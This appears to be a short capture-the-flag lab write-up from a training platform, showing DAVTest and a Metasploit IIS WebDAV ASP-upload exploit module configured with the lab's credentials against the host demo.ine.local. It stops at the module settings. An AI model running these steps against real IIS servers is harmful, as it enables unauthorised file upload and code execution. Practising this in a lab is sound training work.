Windows: IIS Server: WebDav Metasploit

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the WebDAV service and retrieve the flag!

The following username and password may be used to access the service:

Username

Password

bob

password_123321

Tools

  • Metasploit

  • DAVTest

  • Cadaver

Writeup

davtest -url http://demo.ine.local/webdav -auth bob:password_123321
msfconsole
use exploit/windows/iis/iis_webdav_upload_asp 
set rhost demo.ine.local
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp

Last updated